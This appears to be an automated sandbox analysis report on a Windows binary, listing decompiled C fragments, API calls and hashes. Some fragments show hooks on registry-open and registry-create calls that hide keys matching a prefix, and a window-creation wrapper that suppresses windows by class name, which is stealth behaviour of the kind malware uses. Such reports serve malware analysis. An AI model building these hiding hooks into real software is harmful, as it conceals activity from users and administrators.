                                                                                                                        				asm("movq [esp+0x3c], xmm0");
                                                                                                                        				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x20))))(_t83, 0x6f33dbac,  &_v128,  &_v164); // executed
                                                                                                                        				if(_t85 < 0) {
                                                                                                                        					goto L16;
                                                                                                                        				}
                                                                                                                        				_t86 = _v180;
                                                                                                                        				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))(_t86, _v168, 2); // executed
                                                                                                                        				if(_t88 < 0) {
                                                                                                                        					L15:
                                                                                                                        					_t89 = _v192;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
                                                                                                                        					goto L16;
                                                                                                                        				}
                                                                                                                        				_t91 = _v192;
                                                                                                                        				_v196 = 0;
                                                                                                                        				_v184 = 0;
                                                                                                                        				_t93 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x28))))(_t91,  &_v196,  &_v184); // executed
                                                                                                                        				if(_t93 >= 0) {
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_v132 = L"ImageQuality";
                                                                                                                        					__imp__#8( &_v192,  &_v136, 0x20);
                                                                                                                        					asm("movss xmm0, [0x6f33da54]");
                                                                                                                        					_v196 = 4;
                                                                                                                        					_t95 = _v208;
                                                                                                                        					asm("movss [esp+0x2c], xmm0");
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x10))))(_t95, 1,  &_v148,  &_v196);
                                                                                                                        					_t98 = _v236;
                                                                                                                        					_push(_v224);
                                                                                                                        					_push(_t98);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0xc))))() >= 0) {
                                                                                                                        						asm("movq xmm0, [0x6f33dbbc]");
                                                                                                                        						_t105 = _v244;
                                                                                                                        						_push(_v128);
                                                                                                                        						asm("movq [esp+0x40], xmm0");
                                                                                                                        						asm("movq xmm0, [0x6f33dbc4]");
                                                                                                                        						asm("movq [esp+0x48], xmm0");
                                                                                                                        						_push(_v132);
                                                                                                                        						_push(_t105);
                                                                                                                        						if( *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x10))))() >= 0) {
                                                                                                                        							_t108 = _v256;
                                                                                                                        							_t110 =  *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x18))))(_t108,  &_v200); // executed
                                                                                                                        							if(_t110 >= 0) {
                                                                                                                        								_t111 = _v264;
                                                                                                                        								_t113 =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x2c))))(_t111, _v244, 0); // executed
                                                                                                                        								if(_t113 >= 0) {
                                                                                                                        									_t114 = _v276;
                                                                                                                        									_push(_t114);
                                                                                                                        									if( *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0x30))))() >= 0) {
                                                                                                                        										_t116 = _v276;
                                                                                                                        										_push(_t116);
                                                                                                                        										if( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x2c))))() >= 0) {
                                                                                                                        											_t164 = 1;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t101 = _v244;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t101 + 8))))(_t101); // executed
                                                                                                                        					_t103 = _v236;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103); // executed
                                                                                                                        				}
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000), ref: 6F336488
                                                                                                                        • CoCreateInstance.OLE32(6F33DB8C,00000000,00000001,6F33DDAC,?), ref: 6F3364A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000020), ref: 6F33659A
                                                                                                                        • VariantInit.OLEAUT32 ref: 6F3365AC
                                                                                                                        • CoUninitialize.OLE32 ref: 6F3366C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitInitializeInstanceMemoryUninitializeVariantZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 884428471-0
                                                                                                                        • Opcode ID: b67523bdddf209c53f44a973d2dff45fd6fe49b1b54c34612766d1d332be107a
                                                                                                                        • Instruction ID: a9ac813da4e52ee20f93106de82698f31dffcf15b40d92ed829c1863a2887f0f
                                                                                                                        • Opcode Fuzzy Hash: b67523bdddf209c53f44a973d2dff45fd6fe49b1b54c34612766d1d332be107a
                                                                                                                        • Instruction Fuzzy Hash: A371D0B5604752AFD610DF69C880E5BB7F9AFC9744F108A5DF949CB260DB30E802CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 63%
                                                                                                                        			E6F338100(long _a4, WCHAR* _a8, signed int _a12, long _a16, signed int _a28, signed int _a32, struct HWND__* _a36, struct HMENU__* _a40, struct HINSTANCE__* _a44, void* _a48) {
                                                                                                                        				short _v520;
                                                                                                                        				signed int _t16;
                                                                                                                        				struct HWND__* _t21;
                                                                                                                        				long _t33;
                                                                                                                        				intOrPtr _t35;
                                                                                                                        				long _t37;
                                                                                                                        				WCHAR* _t38;
                                                                                                                        				int _t41;
                                                                                                                        				struct HWND__* _t53;
                                                                                                                        
                                                                                                                        				_t33 = _a16;
                                                                                                                        				if((_t33 & 0x40000000) == 0 || _t33 < 0) {
                                                                                                                        					_t16 = 1;
                                                                                                                        					_t33 = _t33 & 0xefffffff;
                                                                                                                        					_t37 = 0x8000080;
                                                                                                                        				} else {
                                                                                                                        					_t37 = _a4;
                                                                                                                        					_t16 = 0;
                                                                                                                        				}
                                                                                                                        				asm("sbb eax, eax");
                                                                                                                        				_t21 = CreateWindowExW(_t37, _a8,  !( ~_t16) & _a12, _t33,  ~_a28,  ~_a32, 0, 0, _a36, _a40, _a44, _a48); // executed
                                                                                                                        				_t53 = _t21;
                                                                                                                        				_t41 = GetClassNameW(_t53,  &_v520, 0x103);
                                                                                                                        				if(_t41 <= 0) {
                                                                                                                        					L10:
                                                                                                                        					return _t53;
                                                                                                                        				} else {
                                                                                                                        					_t38 = M6F340560; // 0x77fbf8
                                                                                                                        					if(lstrcmpiW( &_v520, _t38) != 0) {
                                                                                                                        						if(_t41 > 1) {
                                                                                                                        							_t35 = M6F340558; // 0x7982c4
                                                                                                                        							if(lstrcmpiW( &_v520, _t35 + 2) == 0) {
                                                                                                                        								_push(4);
                                                                                                                        								_push(_t53);
                                                                                                                        								 *0x6f34039c = _t53; // executed
                                                                                                                        								M6F3405B8(); // executed
                                                                                                                        								_push(0x1a);
                                                                                                                        								_push(1);
                                                                                                                        								_push(1);
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        								_push(_t53);
                                                                                                                        								M6F3405C4();
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L10;
                                                                                                                        					} else {
                                                                                                                        						DestroyWindow(_t53); // executed
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(08000080,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 6F33817A
                                                                                                                        • GetClassNameW.USER32 ref: 6F33818D
                                                                                                                        • lstrcmpiW.KERNEL32(0077FBF8,0077FBF8), ref: 6F3381AB
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 6F3381B2
                                                                                                                        • lstrcmpiW.KERNEL32(007982C2,007982C2), ref: 6F3381EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Windowlstrcmpi$ClassCreateDestroyName
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2351571968-0
                                                                                                                        • Opcode ID: 0b2de832266c3c3bf70dd8854cec51ade220f0203205bfff281bcd4033c864e7
                                                                                                                        • Instruction ID: f7c36f7a8f2a3fa451227185245e1935a44bf41670ded956ebe92e91c3711808
                                                                                                                        • Opcode Fuzzy Hash: 0b2de832266c3c3bf70dd8854cec51ade220f0203205bfff281bcd4033c864e7
                                                                                                                        • Instruction Fuzzy Hash: 5E31D273A59761ABE720DA68CC45FEB73ACEB89720F04090DFA55D3180D674A804CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0050BFE5
                                                                                                                        • WNetOpenEnumW.MPR(?,?,?,?,?), ref: 0050C04A
                                                                                                                        • SetLastError.KERNEL32(00000000,00000060,0050C216,00000000,00000002), ref: 0050C059
                                                                                                                        • WNetEnumResourceW.MPR(?,00000001,00000000,00000002), ref: 0050C06B
                                                                                                                        • WNetCloseEnum.MPR(?), ref: 0050C0AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$CloseErrorH_prolog3_catchLastOpenResource
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1630679584-0
                                                                                                                        • Opcode ID: bdf23ed479f09aa7ed804e3d7078131f8f9a979f425e6cc3bab5c3f2139a4766
                                                                                                                        • Instruction ID: 2b01ff344b20b8029a7cce6901f340b1641c3885abb451ca6fb145d16302bfdd
                                                                                                                        • Opcode Fuzzy Hash: bdf23ed479f09aa7ed804e3d7078131f8f9a979f425e6cc3bab5c3f2139a4766
                                                                                                                        • Instruction Fuzzy Hash: 76218D7250020AEFDF229F94CC599EE7FB6FF4A300F104629FA55A61A2C7368A51DB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA0EA
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 004EA12F
                                                                                                                        • SetThreadPriority.KERNEL32(00000000), ref: 004EA136
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CurrentH_prolog3Priority
                                                                                                                        • String ID: TM.
                                                                                                                        • API String ID: 2855252584-234185721
                                                                                                                        • Opcode ID: 51319c999e5b96366f920d5d8bd5fd6d2027de0bb845c39c702a42dffdf2b1c4
                                                                                                                        • Instruction ID: 5a6ade4841129d6a3cde0beb062699e4024c79fba2f0859787c63aaf8a2f2e76
                                                                                                                        • Opcode Fuzzy Hash: 51319c999e5b96366f920d5d8bd5fd6d2027de0bb845c39c702a42dffdf2b1c4
                                                                                                                        • Instruction Fuzzy Hash: AE115C71904288AAEB21EBAAC845D5EBB75BF61355F14461FF002971D2D63CAE04C72A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004D8D56
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,0000003C,004D8EFD,?,?), ref: 004D8DAB
                                                                                                                        • _wmemset.LIBCPMT ref: 004D8DEE
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D8E13
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$H_prolog3_catch__wmemset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2030589627-0
                                                                                                                        • Opcode ID: 89fcff527e000ae42aacffbbac0a854c03ad3806c169435f3b3f909df2c501a9
                                                                                                                        • Instruction ID: 8e503d48b3a9a5b00c99b4d92a2b8f21b7d638f9e343a6dbab2e137ec47b5f21
                                                                                                                        • Opcode Fuzzy Hash: 89fcff527e000ae42aacffbbac0a854c03ad3806c169435f3b3f909df2c501a9
                                                                                                                        • Instruction Fuzzy Hash: 354138B2801118AFDB05DF94DD95DEEBBB8FF54308F10402EF501A7290DA309E46CB64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __calloc_crt.LIBCMT ref: 005429E2
                                                                                                                        • CreateThread.KERNEL32 ref: 00542A26
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,005276BF,00000000,00000000,00527610,?,00000004,?,?,?), ref: 00542A30
                                                                                                                        • __dosmaperr.LIBCMT ref: 00542A48
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 84609068-0
                                                                                                                        • Opcode ID: 72c65561eb2f8508996f698d031463a5aac21ee5c99a265e3bbf851d3e5b7ea5
                                                                                                                        • Instruction ID: 71d6a2fe3dbc70fe9c4961969bcf254d4d6348a84867b948ce607d6c1c091948
                                                                                                                        • Opcode Fuzzy Hash: 72c65561eb2f8508996f698d031463a5aac21ee5c99a265e3bbf851d3e5b7ea5
                                                                                                                        • Instruction Fuzzy Hash: F611273250521AAFDB20BFA4CC468DE7FA4FF4432CF60442DF901E3091DB7199409A64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F337B70(void* _a4, WCHAR* _a8, int _a12, short* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
                                                                                                                        				long _t12;
                                                                                                                        				WCHAR* _t13;
                                                                                                                        				WCHAR* _t22;
                                                                                                                        
                                                                                                                        				_t22 = _a8;
                                                                                                                        				if(_t22 == 0) {
                                                                                                                        					L3:
                                                                                                                        					_t12 = RegCreateKeyExW(_a4, _t22, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
                                                                                                                        					return _t12;
                                                                                                                        				} else {
                                                                                                                        					_t13 = M6F34054C; // 0x78645c
                                                                                                                        					if(StrCmpNIW(_t22, _t13, 0x1c) != 0) {
                                                                                                                        						goto L3;
                                                                                                                        					} else {
                                                                                                                        						return 5;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • StrCmpNIW.SHLWAPI(?,0078645C,0000001C), ref: 6F337B82
                                                                                                                        • RegCreateKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6F337BBE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID: \dx
                                                                                                                        • API String ID: 2289755597-3316144491
                                                                                                                        • Opcode ID: 0f0b7bb08513aa8a537240607028e64ea6209cfc8f06f4674c6377a4e1a172f6
                                                                                                                        • Instruction ID: d0c64012d252ded8bd2e4cffba45c8a4f587b403eb9fd48553b62f64ea081ab6
                                                                                                                        • Opcode Fuzzy Hash: 0f0b7bb08513aa8a537240607028e64ea6209cfc8f06f4674c6377a4e1a172f6
                                                                                                                        • Instruction Fuzzy Hash: 77F01D72218650ABD304DA59D884DABB7FDFFCD724F048A0CB59897244C634ED11CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
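                                                                                                                        			// Wrapper around RegOpenKeyExW that filters on the subkey name (_a8).
                                                                                                                        			long E6F337BD0(void* _a4, WCHAR* _a8, int _a12, int _a16, void** _a20) {
                                                                                                                        				long _t7;
                                                                                                                        				WCHAR* _t8;
                                                                                                                        				WCHAR* _t14;

                                                                                                                        				_t14 = _a8;
                                                                                                                        				if(_t14 == 0) {
                                                                                                                        					L3:
                                                                                                                        					// No subkey name, or no prefix match: pass the call through unchanged.
                                                                                                                        					_t7 = RegOpenKeyExW(_a4, _t14, _a12, _a16, _a20); // executed
                                                                                                                        					return _t7;
                                                                                                                        				} else {
                                                                                                                        					_t8 = M6F34054C; // 0x78645c
                                                                                                                        					// StrCmpNIW returns 0 when the first 0x1c characters match, ignoring case.
                                                                                                                        					if(StrCmpNIW(_t14, _t8, 0x1c) != 0) {
                                                                                                                        						goto L3;
                                                                                                                        					} else {
                                                                                                                        						// Prefix matched: report ERROR_FILE_NOT_FOUND (2) without opening the key.
                                                                                                                        						return 2;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}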







                                                                                                                        APIs
                                                                                                                        • StrCmpNIW.SHLWAPI(?,0078645C,0000001C), ref: 6F337BE2
                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 6F337C0A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID: \dx
                                                                                                                        • API String ID: 71445658-3316144491
                                                                                                                        • Opcode ID: 0c7b019ab81fbcb0129a6cf6262eb85926935d472330c8ab3066a30da819fb1d
                                                                                                                        • Instruction ID: f5b9657d3a9e03e4d8a76d23d97bd5a12ec788d006bad21c6462854e62da286f
                                                                                                                        • Opcode Fuzzy Hash: 0c7b019ab81fbcb0129a6cf6262eb85926935d472330c8ab3066a30da819fb1d
                                                                                                                        • Instruction Fuzzy Hash: 05E06DB2618660EBD210DE18D844EAB77BCEF99B20F00C90DB95587201C730EC11CBB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D873E
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000008,004DDF46,?), ref: 004D8775
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,?,?,?,?,?,00000008,004DDF46,?), ref: 004D87C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$H_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1173560166-0
                                                                                                                        • Opcode ID: 8b497e6277dae8fe07edea6679eab75e1394439edf18a7629113dac179907cf9
                                                                                                                        • Instruction ID: 0f4af20211d2536596288c9866dec7b9355c8039161fb1f7cf1f228bb3b07186
                                                                                                                        • Opcode Fuzzy Hash: 8b497e6277dae8fe07edea6679eab75e1394439edf18a7629113dac179907cf9
                                                                                                                        • Instruction Fuzzy Hash: A8214530A0021AAFDF14DF54CC51AEE7BA4FB49314F10421EF814AB390DB30AA06CBA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 005276E7
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004BC352), ref: 0052770F
                                                                                                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004BC352), ref: 0052771E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseExceptionException@8HandleRaiseResumeThreadThrow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2204380503-0
                                                                                                                        • Opcode ID: ea6e226bd51cb95a21794580d35d9e11eb9e4c09e62242be58ddf81457dcb3f6
                                                                                                                        • Instruction ID: 6daf75a6342c611759c37fe8ba76e13efef75d2f7602a7c0971ff2a5aa0f6ec0
                                                                                                                        • Opcode Fuzzy Hash: ea6e226bd51cb95a21794580d35d9e11eb9e4c09e62242be58ddf81457dcb3f6
                                                                                                                        • Instruction Fuzzy Hash: 3001D270204312AFE700DF5DDC85F56B7A8FF88325F048A18F56887291D774F8458BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BED62
                                                                                                                          • Part of subcall function 004B5743: __EH_prolog3.LIBCMT ref: 004B574A
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(10000000,?,00000000,00000100), ref: 004B5794
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(?,?,00000000,00000100), ref: 004B57CB
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                                        Strings
                                                                                                                        • Callbacks.setLoggedIn: StatusChanged callback not set, xrefs: 004BEDEB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$LoadString$CriticalInitializeSection
                                                                                                                        • String ID: Callbacks.setLoggedIn: StatusChanged callback not set
                                                                                                                        • API String ID: 1365085155-3560364928
